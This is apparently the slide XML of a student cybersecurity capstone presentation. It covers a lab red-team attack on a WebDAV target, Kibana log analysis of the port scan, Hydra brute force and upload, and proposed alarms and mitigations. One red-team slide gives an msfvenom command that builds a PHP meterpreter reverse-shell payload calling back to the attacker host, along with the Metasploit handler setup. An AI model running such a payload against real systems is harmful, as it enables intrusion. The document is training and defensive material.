        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3363975" y="1481325"/>
            <a:ext cx="54657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9" name="Google Shape;1169;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3095775" y="533700"/>
            <a:ext cx="52098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[INSERT: screenshot or command output illustrating the exploit.]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70" name="Google Shape;117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3975" y="1343938"/>
            <a:ext cx="4009976" cy="24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1" name="Google Shape;1171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84550" y="2786665"/>
            <a:ext cx="5209799" cy="18481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p6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 Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;1177;p66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66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66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Payload create and upload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msfvenon -p php /meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt;&gt; hack.php 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msfconsole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Use exploit/multi/handler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Set payload php/meterpreter/reverse_tcp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Option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Set LHOST 192.168.1.90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0" name="Google Shape;1180;p66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81" name="Google Shape;1181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2" name="Google Shape;1182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3" name="Google Shape;1183;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="192684" y="1535723"/>
            <a:ext cx="3646642" cy="1437899"/>
            <a:chOff x="-3503752" y="1885638"/>
            <a:chExt cx="4478804" cy="1687477"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1184" name="Google Shape;1184;p66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3503752" y="2951815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85" name="Google Shape;1185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86" name="Google Shape;1186;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3152775" y="677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7" name="Google Shape;1187;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3258013" y="793475"/>
            <a:ext cx="2428500" cy="39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xploit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pwd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ls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cat flag.txt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b1ngow@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr i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88" name="Google Shape;1188;p66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1189" name="Google Shape;1189;p66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90" name="Google Shape;1190;p66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91" name="Google Shape;11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7717" y="2026950"/>
            <a:ext cx="4791875" cy="288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6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Exploitation: Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p67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67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="511875" y="1481325"/>
            <a:ext cx="83178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9" name="Google Shape;1199;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3159075" y="1530124"/>
            <a:ext cx="2371500" cy="32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200" name="Google Shape;120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275" y="989725"/>
            <a:ext cx="5454749" cy="3704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13200" y="950700"/>
            <a:ext cx="4621199" cy="378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6" name="Google Shape;1206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07" name="Google Shape;1207;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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Log Analysis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Attack Characterization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08" name="Google Shape;1208;p6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p6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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Google Shape;1214;p6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5" name="Google Shape;1215;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="84093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port scan.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6" name="Google Shape;1216;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408500" y="675975"/>
            <a:ext cx="82143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port scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> around 00:50 to 00:55 on february 8 2022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33.976 packets were sent from 192.168.1.90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high number of requests, at least each port respond in a short period of time from one source ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>indicates that this was a port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1217" name="Google Shape;121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500" y="835137"/>
            <a:ext cx="424701" cy="331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8" name="Google Shape;121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8488" y="1533125"/>
            <a:ext cx="8055125" cy="238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p7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Request for the Hidden Directory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24" name="Google Shape;1224;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="4114800" cy="12696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 </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r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225" name="Google Shape;1225;p7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70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="4240500" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14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[Insert Here]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Include a screenshot of Kibana logs depicting the request for the hidden directory.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27" name="Google Shape;1227;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="675975"/>
            <a:ext cx="9087000" cy="7209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request occured around feb 8, 2022 around 00:50 to 1:30AM,  290 requests were made for compagny_folders/secret_folder/.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Google Shape;1228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7350" y="1556025"/>
            <a:ext cx="7896375" cy="220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9" name="Google Shape;1229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725" y="2789500"/>
            <a:ext cx="6561460" cy="2127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p7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Uncovering the Brute Force Attack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35" name="Google Shape;1235;p7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p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="685725"/>
            <a:ext cx="8409300" cy="668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290 requests were made in the attack for /compagny_folders/secret_folder , 3 of them  have http status code 301 means successful. And also when looking the url.path “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/compagny_folders/secret_folder” with user_agent as filtre we can see Mozila/4.0 ( Hydra) ( evidence of brute force attack )</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1237" name="Google Shape;1237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500" y="1467800"/>
            <a:ext cx="5954874" cy="2404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8" name="Google Shape;1238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075" y="3731750"/>
            <a:ext cx="7562224" cy="118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7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Analysis: Finding the WebDAV Connection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244" name="Google Shape;1244;p7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5" name="Google Shape;1245;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085300" y="741300"/>
            <a:ext cx="7197900" cy="9717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48 requests were made to webdav directory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="32004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26 requests were made to hack.php file and 8 to the passwd.dav file</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1246" name="Google Shape;1246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5300" y="1519700"/>
            <a:ext cx="7197875" cy="228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5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Table of Contents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5" name="Google Shape;1025;p55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document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p55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7" name="Google Shape;1027;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="137882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8" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029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latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr sz="3000"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0" name="Google Shape;1030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A9B7C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1" name="Google Shape;1031;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032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02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3" name="Google Shape;1033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4" name="Google Shape;1034;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035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03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6" name="Google Shape;1036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3D85C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7" name="Google Shape;1037;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p55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rgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr sz="3000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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1039" name="Google Shape;1039;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtra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0" name="Google Shape;1040;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="137882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Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="1"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1" name="Google Shape;1041;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2231136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2" name="Google Shape;1042;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3073850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3" name="Google Shape;1043;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3918975"/>
            <a:ext cx="7517100" cy="621300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj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4" name="Google Shape;1044;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="2233550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Red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Security Assessment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5" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150" y="30762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Blue Team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Log Analysis and Attack Characterization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6" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3918975"/>
            <a:ext cx="9168600" cy="60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554475" spcFirstLastPara="1" rIns="45720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Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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: Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="18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0" name="Shape 1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1" name="Google Shape;1251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252" name="Google Shape;1252;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="20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Blue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Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400"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253" name="Google Shape;1253;p73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7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Google Shape;1258;p74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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p74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0" name="Google Shape;1260;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30513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alert can be set when there is a high number of requests for multiple ports in a short </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>period</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t> of time from the same source IP </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>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And a threshold in which will activate the alarm when more than 10 requests come from the same source IP </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>  in less than 2 seconds</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p74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have a list of ip addresses that can access certain ports such as HTTP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firewall has to be configured to block all IPs that have a link with certain suspect activities repeated in several ports at the same time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Block all network traffic from or going to IP 192.168.1.90.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75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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p75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8" name="Google Shape;1268;p75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unauthorized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alarm for any time an outside IP address attempts to access the compagny_folder/secert_folde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>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send an SMS or an email to the soc team each time IP accesses the file</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p75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unwanted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company_folder/secret_folder should be very well protected with s. the information should also be encrypted to do not allow easy access to anyone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required command lines. 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The access to secret_folder must be whitelisted and blocked all access from IP addresses not on this whitelist, logged in.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="14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3" name="Shape 1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4" name="Google Shape;1274;p76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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1275" name="Google Shape;1275;p76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6" name="Google Shape;1276;p76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brute force attacks?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alert when there are five failed logins,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alert for HTTP 401 response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A threshold must be set when five failed logins from the same IP address and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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Google Shape;1277;p76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brute force attacks?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>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s</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trong username and passwords by creating a policy increasing the complexity of password requirements such as special characters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line(s).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Double factor authentication before accessing and security questions for each user</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="14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77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Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p77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4" name="Google Shape;1284;p77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access to this directory?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setting the alarm to signal any access to the WebDAV directory coming from outside the network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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The alarm threshold should be for any attempt to access the WebDAV directory should trigger the alert.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1285" name="Google Shape;1285;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="160470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control access?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prevent access to the server via the web browser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line(s)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Block port 80, port 443 for external blacklist IP</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="14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9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78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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p7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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450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kind of alarm can be set to detect future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Set an alert for any process of uploading file containing executable code to the server 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What threshold would you set to activate this alarm?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the threshold for any PHP file must alert the SOC team via phone call or email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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857900" y="1401125"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="45720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/>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr b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Any file uploads from internal must require a username and password.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400"/>
              <a:t>Any file uploads from external should be blocked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/>
              <a:t>Describe the solution. If possible, provide the required command line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>. 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400"/>
              <a:t>Block port 80, port 443 and  port 4444</a:t>
            </a:r>
            <a:endParaRPr i="1"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4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p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="2088475"/>
            <a:ext cx="8595300" cy="7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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p56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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7061625" y="792950"/>
            <a:ext cx="1821600" cy="4129200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Network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Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Range:192.168.1.0/24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Netmask:255.255.255.0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Gateway:192.168.1.1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Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Blac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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.100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ubuntu 18.04.4 LTS (Linux)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>ELK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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>192.168.1.105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OS:ubuntu 18.04.1 LTS ( GNU/Linux)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>Capstone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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>192.168.1.90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OS:Kali (Linux)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>kali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IPv4:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>192.168.1.1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OS: Windows</a:t>
            </a:r>
            <a:endParaRPr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00"/>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900"/>
              <a:t>ML-REFVM-684427</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4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60" name="Google Shape;106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549" y="857582"/>
            <a:ext cx="5905801" cy="39268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4" name="Shape 10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5" name="Google Shape;106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322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607775" y="4957200"/>
            <a:ext cx="261900" cy="1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0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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600"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="10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/>
              <a:t>Red Team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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t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1068" name="Google Shape;1068;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1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p59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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p59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Nmap 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identified</a:t>
            </a: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 the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr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75" name="Google Shape;1075;p59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76" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198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{2755310F-95EA-4E01-95FB-42BB52A92B5E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
              </a:tblGrid>
              <a:tr h="40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Hostname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IP Address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Role on Network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Capstone</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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192.168.1.105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target machine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b="1" sz="10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ML-REFVM-684427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Host machine (the main machine in which the VMs that play the role of attacker,  and target are installed)</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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kali</a:t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192.168.1.90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attacker machine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34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ELK</a:t>
                      </a:r>
                      <a:endParaRPr sz="15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192.168.1.100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100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Monitoring machine, plays the role of SIEM (the system information and event management) which allows us to collect logs from the target machine</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="11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0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p60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83" name="Google Shape;1083;p60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84" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="660125" y="12019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{2755310F-95EA-4E01-95FB-42BB52A92B5E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2696375"/>
                <a:gridCol w="2696375"/>
                <a:gridCol w="2696375"/>
